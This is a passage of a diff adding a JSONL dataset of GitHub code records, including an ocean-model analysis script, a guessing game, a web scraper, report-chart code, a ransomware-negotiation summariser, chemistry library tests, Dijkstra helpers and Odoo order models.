diff --git "a/2985.jsonl" "b/2985.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2985.jsonl"
@@ -0,0 +1,1863 @@
+{"seq_id":"72767799271","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport MITgcmutils as mit\n\nplt.ion()\n\n#dir0 = '/home/bderembl/work/MITgcm/myrun/test_kw_energetics/run/'\ndir0 = '/media/bderembl/workd/MITgcm/myrun/test_kw_energetics/run03/'\ndir1 = dir0 + 'mnc*/'\ndir2 = dir0 + 'mnc_test_0001/'\n\nfile0 = 'grid.t*'\nfile1 = 'state.*'\nfile2 = 'oceDiag.*'\n\nalphat = 2e-4\ngo = 9.81\n\n# grid\nf0 = mit.mnc_files(dir1 + file0)\n\nRC = f0.variables['RC'][:]\nDRC = f0.variables['drC'][:]\nDRF = f0.variables['drF'][:]\nRF = f0.variables['RF'][:]\n\nXC = f0.variables['XC'][:,:]\nYC = f0.variables['YC'][:,:]\n\nsi_y,si_x = XC.shape\nsi_z = RC.size\n\ndx = XC[1,1] - XC[0,0]\ndy = YC[1,1] - YC[0,0]\ndz = RC[1] - RC[0]\n\ndv = np.abs(dx*dy*dz)\n\nf2 = mit.mnc_files(dir1 + file2)\nT = f2.variables['T'][:]\nsi_t = len(T)\n\n# compute KE, PE\ncirc = np.zeros((si_t))\n\nfor nt in range (0,si_t):\n rv = f2.variables['momVort3'][nt,0,:si_y,:si_x]\n\n circ[nt] = np.sum(np.sum(rv,0),0)\n\n\ncirc = circ/(si_y*si_x)\n\nTd = T/86400\n\nnp.savetxt('mit_rv.dat',circ)\n\n\nplt.figure()\nplt.plot(T,circ[:],'k')\n\n","repo_name":"bderembl/mitgcm_configs","sub_path":"qg_kelvin/analysis/pv_budget.py","file_name":"pv_budget.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"74407160550","text":"from random import *\r\nfrom colorama import Fore, init\r\ninit()\r\n\r\nprint(Fore.GREEN)\r\nmyName = input('Привет! Как тебя зовут? ') # знакомимся с пользователем\r\nnumber = randint(1, 100)\r\nguessTaken = 0 # переменная хранит значения попыток пользователя\r\n\r\nprint(Fore.CYAN, f'{myName}, я загадал число от 1 до 100. Твоя задача угадать это число.')\r\n\r\n\r\nfor guessTaken in range(7): # считаем количество попыток\r\n print('Попробуй угадать.')\r\n guess = int(input('Вводи число: ')) # т.к. мы хотим получать только числа, сразу преобразуем тип данных\r\n\r\n if guess > number:\r\n print(guess, 'Слишком много!')\r\n print()\r\n\r\n if guess < number:\r\n print(guess, 'Слишком мало!')\r\n print()\r\n\r\n if guess == number:\r\n break\r\n\r\n\r\ndef getEnding(guessTaken):\r\n lastChars = guessTaken % 100\r\n\r\n if 2 <= lastChars <= 4:\r\n return 'ки'\r\n else:\r\n lastChars = guessTaken % 10\r\n if lastChars == 1:\r\n return 'ку'\r\n elif lastChars >= 5 <= 20:\r\n return 'ок'\r\n\r\n\r\nif guess == number:\r\n print(f'Поздравляю, {myName}, ты угадал число за {guessTaken + 1} попыт{getEnding(guessTaken)}.')\r\n\r\nif guess != number:\r\n print('К сожалению, тебе не удалось угадать. Я загадал число: ', number, '.')\r\n\r\n","repo_name":"GreatRaksin/GuessTheNumber","sub_path":"guessLevelProColorama.py","file_name":"guessLevelProColorama.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39024426385","text":"import requests\nimport pandas as pd\nimport numpy as np\nimport re\nfrom bs4 import BeautifulSoup\n\n\nclass Scraper:\n def __init__(self, url, reqs=None, soup=None):\n self.url = url\n self.reqs = requests.get(self.url)\n self.soup = BeautifulSoup(self.reqs.text, 'html.parser')\n\n def is_clean(self, link):\n glitch_words = [\"twitter\", \"facebook\", \"pib.gov.in\",\n \"t.co\", \"whatsapp\", \"google\", \"linkedin\"]\n for g_word in glitch_words:\n if g_word in link:\n return False\n return True\n\n def scrape_links(self):\n urls = []\n for link in self.soup.find_all('a'):\n if self.is_clean(link.get('href')):\n urls.append(link.get('href'))\n return urls\n\n\n# SCRAPING TABLES FROM WEBPAGE {SETTING THE ANCHOR AND REVERSE ITERATING}\n\n\n def scrape_tables(self):\n page = pd.read_html(self.url)\n tables = []\n for table in range(int(len(page)/2)):\n df = page[table]\n Array2d = df.to_numpy()\n Array2d = Array2d\n temp_table = Array2d.tolist()\n tables.append(temp_table)\n return tables\n\n def scrape_images(self):\n image_data = []\n images = self.soup.select('img')\n for image in images:\n src = image.get('src')\n image_data.append(src)\n final_image_data = list(set(image_data))\n return final_image_data\n\n def preprocess(self, hs):\n remove_space = re.sub(' +', ' ', hs)\n remove_n = re.sub('\\n', '', remove_space)\n remove_r = re.sub('\\r', '', remove_n)\n return remove_r\n\n def scrape_text(self):\n final_text = []\n page = pd.read_html(self.url)\n try:\n SOUP = self.soup\n for data in SOUP('tbody'):\n data.decompose()\n hs = SOUP.text\n except:\n hs = self.soup.text\n print('soup:', hs)\n final_text = self.preprocess(hs)\n val0 = re.search(\"Posted On\", final_text).span()[1]+34\n val = re.search(\"\\*\\*\", final_text).span()[0]\n return [final_text[val0:val]]\n\n def scrape_page(self):\n text = self.scrape_text()\n assets = {}\n images = self.scrape_images()\n tables = self.scrape_tables()\n imp_links = self.scrape_links()\n exported_data = {}\n assets = {\"images\": images, \"tables\": tables, \"imp_links\": imp_links}\n exported_data.update({\"text\": text[0]})\n exported_data.update({\"assets\": assets})\n exported_data.update({\"link\": self.url})\n print(exported_data)\n return exported_data\n","repo_name":"saar-official/scraper","sub_path":"scraper/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5021771911","text":"\"\"\"Class methods for report charts.\"\"\"\n\n# Standard Python Libraries\nimport os\n\n# Third-Party Libraries\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\n\nmatplotlib.use(\"Agg\")\n\n\n# Factor to convert cm to inches\nCM_CONVERSION_FACTOR = 2.54\n\n# Get base directory to save images\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n\nclass Charts:\n \"\"\"Build charts.\"\"\"\n\n def __init__(self, df, width, height, name, title, x_label, y_label):\n \"\"\"Initialize chart class.\"\"\"\n self.df = df\n self.title = title\n self.x_label = x_label\n self.y_label = y_label\n self.width = width\n self.height = height\n self.name = name\n\n def pie(self):\n \"\"\"Build pie chart.\"\"\"\n df = self.df\n width = self.width\n height = self.height\n name = self.name\n plt.rcParams.update({\"figure.max_open_warning\": 0})\n category_name = df.columns[0]\n value_name = df.columns[1]\n df = df.sort_values(by=value_name, ascending=False)\n category_column = df[category_name]\n value_column = df[df.columns[1]]\n labels = category_column\n plt.gca().axis(\"equal\")\n\n def autopct(pct):\n \"\"\"Get percentages for the pie chart slices > 10%.\"\"\"\n return (\"%1.0f%%\" % pct) if pct > 1 else \"\"\n\n pie = plt.pie(\n value_column,\n startangle=0,\n radius=1,\n autopct=autopct,\n textprops={\"color\": \"w\", \"fontsize\": 7},\n )\n plt.legend(\n pie[0],\n labels,\n bbox_to_anchor=(1, 0.5),\n loc=\"center right\",\n fontsize=7,\n bbox_transform=plt.gcf().transFigure,\n frameon=False,\n )\n plt.subplots_adjust(left=0.2, wspace=0.2)\n plt.gcf().set_size_inches(\n width / CM_CONVERSION_FACTOR, height / CM_CONVERSION_FACTOR\n )\n plt.savefig(\n BASE_DIR + \"/assets/\" + name, transparent=True, dpi=500, bbox_inches=\"tight\"\n )\n plt.clf()\n\n def stacked_bar(self):\n \"\"\"Build stacked bar chart.\"\"\"\n df = self.df\n title = self.title\n x_label = self.x_label\n y_label = self.y_label\n width = self.width\n height = self.height\n name = self.name\n color = [\"#1357BE\", \"#D0342C\"]\n df.plot(kind=\"bar\", stacked=True, zorder=3, color=color)\n # Add title to chart\n plt.title(title, pad=15, fontsize=10)\n # Format chart's axis\n plt.xlabel(x_label, labelpad=10, fontdict={\"size\": 8})\n plt.ylabel(y_label, labelpad=10, fontdict={\"size\": 8})\n plt.gca().yaxis.set_major_locator(MaxNLocator(integer=True))\n plt.rc(\"axes\", axisbelow=True)\n plt.grid(axis=\"y\", zorder=0)\n plt.xticks(rotation=0)\n plt.ylim(ymin=0)\n # Set sizing for image\n plt.gcf().set_size_inches(\n width / CM_CONVERSION_FACTOR, height / CM_CONVERSION_FACTOR\n )\n plt.tight_layout()\n # Save chart to assets directory\n plt.savefig(BASE_DIR + \"/assets/\" + name, transparent=True, dpi=500)\n plt.clf()\n\n def h_bar(self):\n \"\"\"Build horizontal bar chart.\"\"\"\n df = self.df\n x_label = self.x_label\n y_label = self.y_label\n width = self.width\n height = self.height\n name = self.name\n plt.rcParams.update({\"figure.max_open_warning\": 0})\n category_name = df.columns[0]\n value_name = df.columns[1]\n category_column = df[category_name].str.replace(\"Vulnerable Product - \", \"\")\n value_column = df[df.columns[1]]\n bar_width = 0.6\n fig, ax = plt.subplots()\n ax.spines.right.set_visible(False)\n ax.spines.top.set_visible(False)\n # Generate horizontal bar chart\n plt.barh(df.index, value_column, bar_width, align=\"center\", color=\"#466fc6\")\n # Specify axis atributes\n plt.xticks(fontsize=7)\n plt.yticks(fontsize=7)\n 
plt.xlim(xmin=0)\n plt.gca().xaxis.set_major_locator(MaxNLocator(integer=True))\n plt.gca().set_ylim(-1.0, len(category_column))\n plt.gca().set_yticks(df.index)\n plt.gca().set_yticklabels(category_column)\n plt.gca().set_xlabel(x_label, fontdict={\"size\": 8})\n plt.gca().set_ylabel(y_label)\n # Set sizing for image\n plt.gcf().set_size_inches(\n width / CM_CONVERSION_FACTOR, height / CM_CONVERSION_FACTOR\n )\n plt.tight_layout()\n # Add data labels to each bar if greater than 0\n for i in range(len(df)):\n if df.loc[i, value_name] > 0:\n label = df.loc[i, value_name]\n plt.annotate(\n label, # this is the text\n (df.loc[i, value_name], i), # this is the point to label\n textcoords=\"offset points\", # how to position the text\n xytext=(7, -3), # distance from text to points (x,y)\n ha=\"center\", # horizontal alignment can be left, right or center\n fontsize=8,\n )\n # Save chart to assets directory\n plt.savefig(\n BASE_DIR + \"/assets/\" + name, transparent=True, dpi=500, bbox_inches=\"tight\"\n )\n plt.clf()\n\n def line_chart(self):\n \"\"\"Build line chart.\"\"\"\n df = self.df\n x_label = self.x_label\n y_label = self.y_label\n width = self.width\n height = self.height\n name = self.name\n color = [\"#7aa5c1\", \"#e08493\"]\n fig, ax = plt.subplots()\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n plt.set_loglevel(\"WARNING\")\n # Plot first line on chart\n plt.plot(\n df.index,\n df[df.columns[0]],\n color=color[0],\n label=df.columns[0],\n linewidth=3,\n marker=\".\",\n markersize=10,\n )\n # If there is another column chart the second line\n if len(df.columns) == 2:\n plt.plot(\n df.index,\n df[df.columns[1]],\n color=color[1],\n label=df.columns[1],\n linewidth=3,\n linestyle=\"dashed\",\n marker=\".\",\n markersize=10,\n )\n # Set the y-max to 110% of the max y value\n y_max = int(df[df.columns].max().max() * 1.1)\n plt.ylim(ymin=0, ymax=y_max * 1.10)\n # Place the legend in the upper right corner\n plt.legend(loc=\"upper right\")\n # Set size of the chart\n plt.gcf().set_size_inches(\n width / CM_CONVERSION_FACTOR, height / CM_CONVERSION_FACTOR\n )\n # Format tick marks and grid layout\n plt.xticks(fontsize=7)\n plt.yticks(fontsize=7)\n plt.gca().set_ylabel(y_label, labelpad=10, fontdict={\"size\": 8})\n plt.xlabel(x_label, labelpad=10, fontdict={\"size\": 8})\n plt.xticks(rotation=0)\n plt.grid(axis=\"y\")\n plt.tight_layout()\n\n # Add data labels\n # Loop through the dataframe\n for row in df.itertuples():\n # Check if there is only one row of values\n if len(row) == 2:\n plt.annotate(\n str(int(row[1])),\n xy=(row[0], row[1]),\n textcoords=\"offset points\", # Set the manner to position the text\n xytext=(\n 0,\n 8,\n ), # Distance from text to points (x,y)\n ha=\"center\", # Set horizontal alignment to center\n color=\"#003e67\",\n )\n # Check if there are two rows of data\n elif len(row) == 3:\n # Check if the two values are within 1/10th of the max y value\n value_diff = abs(row[1] - row[2])\n if value_diff < y_max / 10:\n # If the values are on the bottom quarter of the graph don't label below values\n if min(row[1], row[2]) < y_max / 4:\n y1 = y2 = max(row[1], row[2])\n if row[1] > row[2]:\n y1_offset = 18\n y2_offset = 8\n else:\n y1_offset = 8\n y2_offset = 18\n # If the values are not in the bottom quarter place the lower value below the point\n else:\n y1 = row[1]\n y2 = row[2]\n if row[1] > row[2]:\n y1_offset = 8\n y2_offset = -17\n else:\n y1_offset = -17\n y2_offset = 8\n # If values are not close to each other put the 
labels directly above the value\n else:\n y1 = row[1]\n y2 = row[2]\n y1_offset = 8\n y2_offset = 8\n\n # Annotate the data points\n plt.annotate(\n str(int(row[1])),\n xy=(row[0], y1),\n textcoords=\"offset points\", # Set how to position the text\n xytext=(\n 0,\n y1_offset,\n ), # Distance from text to points (x,y)\n ha=\"center\", # Horizontal alignment can be left, right or center\n color=\"#005288\",\n )\n plt.annotate(\n str(int(row[2])),\n xy=(row[0], y2),\n textcoords=\"offset points\", # Set how to position the text\n xytext=(\n 0,\n y2_offset,\n ), # Distance from text to points (x,y)\n ha=\"center\", # Set horizontal alignment to center\n # fontsize=2,\n color=\"#c41230\",\n )\n # Save chart to assets directory\n plt.savefig(\n BASE_DIR + \"/assets/\" + name, transparent=True, dpi=500, bbox_inches=\"tight\"\n )\n plt.clf()\n","repo_name":"cisagov/pe-reports","sub_path":"src/pe_reports/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":10390,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"71"}
+{"seq_id":"34430011391","text":"import json\nimport openai\nimport argparse\nimport os\nfrom dotenv import load_dotenv\n\n# Load OpenAI API key from .env file\nload_dotenv()\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\ndef read_json_file(filename):\n \"\"\"Read a JSON file and return its contents.\"\"\"\n with open(filename, 'r') as file:\n return json.load(file)\n\ndef ask_openai(question, content):\n \"\"\"Ask a question to ChatGPT using the OpenAI API.\"\"\"\n response = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=f\"{content}\\n\\n{question}\",\n max_tokens=150\n )\n return response.choices[0].text.strip()\n\ndef extract_details_from_json(json_content):\n \"\"\"Ask ChatGPT about details in the JSON content.\"\"\"\n # Extract ransom demand\n ransom_demand_question = \"How much was the ransom demand, answer only the figure of the amount?\"\n ransom_demand = ask_openai(ransom_demand_question, json_content)\n print(f\"Ransom Demand: {ransom_demand}\")\n\n # Extract negotiated ransom\n negotiated_ransom_question = \"How much was the negotiated ransom, answer only the figure of the amount?\"\n negotiated_ransom = ask_openai(negotiated_ransom_question, json_content)\n print(f\"Negotiated Ransom: {negotiated_ransom}\")\n\n # Check if victim paid the ransom\n paid_ransom_question = \"Did the victim pay the ransom, answer only yes or no?\"\n paid_ransom = ask_openai(paid_ransom_question, json_content)\n print(f\"Paid Ransom: {paid_ransom}\")\n\ndef main():\n parser = argparse.ArgumentParser(description='Ask questions about a provided JSON file using ChatGPT.')\n parser.add_argument('filename', help='Path to the JSON file.')\n\n args = parser.parse_args()\n json_content = read_json_file(args.filename)\n extract_details_from_json(str(json_content))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JMousqueton/ransomware.live","sub_path":"analyse_negotiation.py","file_name":"analyse_negotiation.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"71"}
+{"seq_id":"72230741669","text":"import pandas as pd\nimport pytest\nfrom fluids.numerics import assert_close, assert_close1d, assert_close2d\n\nfrom chemicals.heat_capacity import CRC_standard_data, TRC_gas_data\nfrom chemicals.reaction import (\n Gibbs_formation,\n Hf_basis_converter,\n Hfg,\n Hfg_all_methods,\n Hfg_API_TDB_data,\n Hfg_ATcT_data,\n Hfg_methods,\n Hfg_S0g_YAWS_data,\n Hfl,\n Hfl_ATcT_data,\n Hfl_methods,\n Hfs,\n Hfs_methods,\n S0g,\n S0g_all_methods,\n S0g_methods,\n S0l,\n S0l_methods,\n S0s,\n S0s_methods,\n balance_stoichiometry,\n entropy_formation,\n standard_formation_reaction,\n stoichiometric_matrix,\n)\n\n\ndef test_API_TDB_data():\n assert Hfg_API_TDB_data['Hfg'].abs().sum() == 101711260\n assert Hfg_API_TDB_data.shape == (571, 2)\n\n\ndef test_ATcT_l():\n assert Hfl_ATcT_data.shape == (34,5)\n tots_calc = [Hfl_ATcT_data[i].abs().sum() for i in ['Hfl_0K', 'Hfl', 'uncertainty']]\n tots = [2179500.0, 6819443, 19290]\n assert_close1d(tots_calc, tots)\n\n\ndef test_Hfg_ATcT_data():\n assert Hfg_ATcT_data.shape == (595, 5)\n tots_calc = [Hfg_ATcT_data[i].abs().sum() for i in ['Hfg_0K', 'Hfg', 'uncertainty']]\n tots = [300788330, 300592764, 829204]\n assert_close1d(tots_calc, tots)\n\ndef test_Hfg_API_TDB_data():\n assert_close(Hfg('7732-18-5', method='API_TDB_G'), -241820.0)\n\n assert Hfg_methods('7732-18-5') == ['ATCT_G', 'CRC', 'API_TDB_G', 'WEBBOOK', 'TRC', 'JANAF', 'YAWS']\n\n assert None is Hfg('98-00-1')\n\n with pytest.raises(Exception):\n Hfg('98-00-0', method='BADMETHOD')\n\n@pytest.mark.slow\ndef test_Hfg_API_TDB_data_fuzz():\n tot = sum([abs(Hfg(i, method='API_TDB_G')) for i in Hfg_API_TDB_data.index])\n assert_close(tot, 101711260.0)\n\n\ndef test_Hfl():\n Hfs = [Hfl('67-56-1'), Hfl('67-56-1', method='ATCT_L')]\n assert_close1d(Hfs, [-238400.0]*2)\n\n assert Hfl_methods('67-56-1') == ['ATCT_L', 'CRC', 'WEBBOOK']\n assert None is Hfl('98-00-1')\n\n tot = sum([abs(Hfl(i)) for i in Hfl_ATcT_data.index])\n assert_close(tot, 6819443.0)\n\n with pytest.raises(Exception):\n Hfl('98-00-0', method='BADMETHOD')\n\n\ndef test_Hfg():\n # default method ATCT_G\n assert_close(Hfg('7732-18-5'), -241822.0)\n\n Hfs = [Hfg('67-56-1', method=i) for i in Hfg_all_methods]\n assert_close1d(Hfs, [-200700.0, -190100.0, -201000.0, -205000.0, None, -200900.0, -216200.0])\n\n assert Hfg_methods('67-56-1') == ['ATCT_G', 'CRC', 'API_TDB_G', 'WEBBOOK', 'TRC', 'YAWS', 'JOBACK']\n assert_close(-211800.0, Hfg('98-00-0'))\n\n with pytest.raises(Exception):\n Hfg('98-00-0', method='BADMETHOD')\n\ndef test_Hfs():\n assert_close(Hfs('101-81-5'), 71500)\n assert_close(Hfs('101-81-5', method='CRC'), 71500)\n assert ['CRC', 'WEBBOOK'] == Hfs_methods('101-81-5')\n\n\n\n@pytest.mark.fuzz\n@pytest.mark.slow\ndef test_Hfg_all_values():\n tot1 = sum([abs(Hfg(i, method='TRC')) for i in TRC_gas_data.index[pd.notnull(TRC_gas_data['Hfg'])]])\n assert_close(tot1, 495689880.0)\n\n tot2 = sum([abs(Hfg(i, method='ATCT_G')) for i in Hfg_ATcT_data.index])\n assert_close(tot2, 300592764.0)\n\n tot3 = sum([abs(Hfg(i, method='YAWS')) for i in Hfg_S0g_YAWS_data.index[pd.notnull(Hfg_S0g_YAWS_data['Hfg'])]])\n assert_close(tot3, 1544220403.0)\n\n tot4 = sum([abs(Hfg(i, method='CRC')) for i in CRC_standard_data.index[pd.notnull(CRC_standard_data['Hfg'])]])\n assert_close(tot4, 392946600.0)\n\ndef test_S0g():\n S0s = [S0g('7732-18-5', method=i) for i in S0g_all_methods]\n assert_close1d(S0s, [188.8, 188.83842, 188.834, 188.84])\n\n assert S0g_methods('67-56-1') == ['CRC', 'YAWS']\n\n assert_close(239.9, 
S0g('67-56-1'))\n\n with pytest.raises(Exception):\n S0g('98-00-0', method='BADMETHOD')\n\n@pytest.mark.fuzz\n@pytest.mark.slow\ndef test_S0g_all_values():\n tot3 = sum([abs(S0g(i, method='YAWS')) for i in Hfg_S0g_YAWS_data.index[pd.notnull(Hfg_S0g_YAWS_data['S0g'])]])\n assert_close(tot3, 2690113.4130000058)\n\n tot4 = sum([abs(S0g(i, method='CRC')) for i in CRC_standard_data.index[pd.notnull(CRC_standard_data['S0g'])]])\n assert_close(tot4, 141558.30000000008)\n\n\ndef test_S0s():\n assert_close(S0s('7439-93-2'), 29.1) # Lithium\n assert_close(S0s('7439-93-2', method='CRC'), 29.1)\n\n methods = S0s_methods('7439-93-2')\n assert methods == ['CRC', 'WEBBOOK']\n\ndef test_S0l():\n assert_close(S0l('7439-97-6'), 75.9) # Lithium\n assert_close(S0l('7439-97-6', method='CRC'), 75.9)\n\n methods = S0l_methods('7439-97-6')\n assert methods == ['CRC', 'WEBBOOK']\n\ndef test_Gibbs_formation():\n Gf = Gibbs_formation(-285830.0, 69.91, [0.0, 0.0], [130.571, 205.147], [1.0, .5])\n assert_close(Gf, -237161.633825)\n\n Gf = Gibbs_formation(-241818, 188.825, [0.0, 0], [130.571, 205.147], [1.0, .5])\n assert_close(Gf, -228604.141075)\n\n Gf = Gibbs_formation(-648980, 297.713, [0.0, 0.0, 0.0], [5.74, 152.206, 202.789], [1, .5, 1.5])\n assert_close(Gf, -622649.329975)\n\n\ndef test_Hf_basis_converter():\n assert_close(Hf_basis_converter(44018.0, Hf_liq=-285830.0), -241812)\n\n assert_close(Hf_basis_converter(44018, Hf_gas=-241812.0), -285830)\n\n with pytest.raises(ValueError):\n Hf_basis_converter(44018, Hf_liq=None)\n with pytest.raises(ValueError):\n Hf_basis_converter(2000, Hf_gas=None, Hf_liq=None)\n with pytest.raises(ValueError):\n Hf_basis_converter(Hvapm=-1, Hf_liq=1)\n with pytest.raises(ValueError):\n Hf_basis_converter(Hvapm=None, Hf_liq=1)\n\ndef test_entropy_formation():\n Sf = entropy_formation(Hf=-74520.0, Gf=-50490.0)\n assert_close(Sf, -80.59701492537314)\n\n Sf = entropy_formation(Hf=-241818, Gf=-228572)\n assert_close(Sf, -44.427301693778304)\n\n\n\ndef test_balance_stoichiometry():\n test_cases = [\n [[{'Hg': 1, 'O': 1}, {'Hg': 1}, {'O': 2}], [True, False, False], [2.0, 2.0, 1.0]],\n [[{'Cl': 2}, {'C': 3, 'H': 6}, {'C': 3, 'Cl': 1, 'H': 5}, {'Cl': 1, 'H': 1}],\n [True, True, False, False, False],\n [1, 1, 1, 1]],\n [[{'Al': 1}, {'H': 1, 'N': 1, 'O': 3}, {'Al': 1, 'N': 3, 'O': 9}, {'N': 1, 'O': 1}, {'H': 2, 'O': 1}],\n [True, True, False, False, False],\n [1.0, 4.0, 1.0, 1.0, 2.0]],\n [[{'Fe': 1}, {'O': 2}, {'Fe':2, 'O': 3}], [True, True, False], [4.0, 3.0, 2.0]],\n [[{'N': 1, 'H': 3}, {'O': 2}, {'N': 1, 'O': 1}, {'H': 2, 'O': 1}], [True, True, False, False], [4.0, 5.0, 4.0, 6.0]],\n [[{'O': 2}, {'H': 2, 'O': 1}, {'C': 1, 'O': 2}, {'C': 6, 'H': 14}], [True, False, False, True], [19.0, 14.0, 12.0, 2.0]],\n\n ]\n\n for atomss, statuses, products in test_cases:\n assert_close1d(balance_stoichiometry(stoichiometric_matrix(atomss, statuses)), products)\n\n\ndef test_stoichiometric_matrix():\n res = stoichiometric_matrix([{'Mg': 1, 'O': 1}, {'Mg': 1}, {'O': 2}], [True, False, False])\n assert_close2d([[1, -1, 0], [1, 0, -2]], res)\n\n\ndef test_standard_formation_reaction():\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 3, 'H': 8})\n assert coeff_test == [3.0, 4.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 3, 'H': 7, 'N': 1, 'O': 2, 'S': 1})\n assert coeff_test == [6.0, 7.0, 1.0, 2.0, 2.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'N': 2}, 
{'O': 2}, {'S': 1}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 6, 'H': 7, 'B': 1, 'O': 2})\n assert coeff_test == [12.0, 7.0, 2.0, 2.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'B': 1}, {'O': 2}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 4, 'H': 12, 'Si': 1})\n assert coeff_test == [4.0, 6.0, 1.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'Si': 1}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 12, 'H': 10, 'Cl': 1, 'P': 1})\n assert coeff_test == [24.0, 10.0, 1.0, 2.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'Cl': 2}, {'P': 1}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 2, 'H': 4, 'Br': 1, 'F': 1})\n assert coeff_test == [4.0, 4.0, 1.0, 1.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'Br': 2}, {'F': 2}]\n","repo_name":"CalebBell/chemicals","sub_path":"tests/test_reaction.py","file_name":"test_reaction.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"71"}
+{"seq_id":"71223671911","text":"def dijkstra(start, end, graph):\n\t\"\"\"\n\n\tInput: start node, end (list of nodes) and graph\n\tGraph: 2D list with node objects\n\tNode: value, previous, dist_source, neighbors, visited\n\tReturns: Nothing, just modified previous in nodes so that shortest path can be found from end.\n\tNote: Meant for matrices\n\n\t\"\"\"\n\tunvisited = [vertex for row in graph for vertex in row]\n\tcurrent = start\n\twhile True:\n\t\tif current in end or len(unvisited) == 0:\n\t\t\tbreak\n\t\tfor vertex in current.neighbors: #I think this checks neighbors that are visited as well.\n\t\t\tif vertex.visited == True:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdistance = vertex.value + current.value + current.dist_source\n\t\t\t\tif distance < vertex.dist_source:\n\t\t\t\t\tvertex.dist_source = distance\n\t\t\t\t\tvertex.previous = current\n\t\tunvisited.remove(current)\n\t\tcurrent.visited = True\n\t\tcurrent = min(unvisited, key = lambda x: x.dist_source)\n\n\ndef path_sum(last_point, graph):\n\t\"\"\"\n\t\n\tInput: last point (starting here), graph\n\tGraph: 2D list with node objects\n\tNode: value, previous, dist_source, neighbors, visited\n\tReturns: The sum of the values in the shortest path (or any path)\n\tNote: Meant for matrices\n\n\t\"\"\"\n\tcurrent = last_point\n\tpath_sum = 0\n\twhile True:\n\t\t#print current.value\n\t\tpath_sum += current.value\n\t\tif not current.previous:\n\t\t\tbreak\n\t\tcurrent = current.previous\n\treturn path_sum\t\n","repo_name":"fugitiveinkc/Project_Euler","sub_path":"projecteuler_algorithms.py","file_name":"projecteuler_algorithms.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"13534589042","text":"from odoo import fields, models, api, _\n\n\nclass PackageOrder(models.Model):\n _name = 'package.order'\n _description = 'Description'\n\n name = fields.Char(default=_('New'), readonly=True, required=True)\n customer_id = fields.Many2one('res.partner', domain=[('is_company', '=', False)])\n address = fields.Text('Address', store=True)\n vendor_id = fields.Many2one('res.partner', domain=[('is_company', '=', True)])\n line_ids = fields.One2many('package.order.line', 'order_id', string='Lines')\n note = fields.Html()\n total = fields.Float('Total', compute=\"_compute_total\")\n customer_commission = fields.Float(\"Customer Commission\", compute=\"_compute_customer_commission\")\n refund_amount = fields.Float('Refund Amount', compute=\"_compute_refund_amount\")\n value_due = fields.Float(\"Value Due\", compute=\"_compute_value_due\")\n\n @api.onchange(\"customer_id\")\n def _change_address(self):\n for order in self:\n if order.customer_id:\n order.address = f'{order.customer_id.street} ' if order.customer_id.street else ''\n order.address += f'or {order.customer_id.street2} ' if order.customer_id.street2 else ''\n order.address += f', {order.customer_id.city}' if order.customer_id.city else ''\n order.address += f' in {order.customer_id.state_id.name}' if order.customer_id.state_id else ''\n else:\n order.address = ''\n\n\n @api.depends('total')\n def _compute_value_due(self):\n for order in self:\n order.value_due = order.total + (order.total * (order.customer_id.commission / 100))\n\n @api.depends('line_ids', 'customer_id')\n def _compute_total(self):\n for order in self:\n sum_line = 0\n for line in order.line_ids:\n sum_line += line.sub_total\n order.total = sum_line\n\n @api.depends('total', 'customer_id')\n def _compute_refund_amount(self):\n for order in self:\n order.refund_amount = order.value_due - (order.total * (order.customer_id.commission / 100))\n\n @api.depends('customer_id', 'total')\n def _compute_customer_commission(self):\n for order in self:\n order.customer_commission = order.total * (order.customer_id.commission / 100)\n\n @api.model\n def create(self, vals):\n # We generate a standard reference\n vals['name'] = self.env['ir.sequence'].next_by_code('package.order') or '/'\n return super(PackageOrder, self).create(vals)\n\n\nclass PackageOrderLine(models.Model):\n _name = 'package.order.line'\n\n order_id = fields.Many2one('package.order')\n product_id = fields.Many2one('product.product')\n quantity = fields.Integer('quantity', default=1)\n price = fields.Float('Price', related='product_id.lst_price')\n sub_total = fields.Float('Sub Total', compute=\"_compute_total\")\n\n @api.depends('product_id', 'quantity')\n def _compute_total(self):\n for line in self:\n line.sub_total = line.quantity * 